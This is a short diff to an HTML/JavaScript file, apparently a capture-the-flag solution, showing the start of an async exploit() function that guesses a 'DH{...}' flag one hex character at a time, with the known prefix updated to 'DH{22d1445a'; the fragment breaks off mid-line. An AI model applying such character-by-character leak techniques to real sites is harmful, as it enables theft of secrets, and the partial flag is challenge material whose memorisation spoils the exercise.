--- a/static/js/test.html
+++ b/static/js/test.html
@@ -37,7 +37,7 @@
 
     async function exploit() {
         let chars = "0123456789abcdef}";
-        let secret = "DH{";
+        let secret = "DH{22d1445a";
 
         while (!secret.includes("}")) {
             let promises = chars.split("").map(c => 
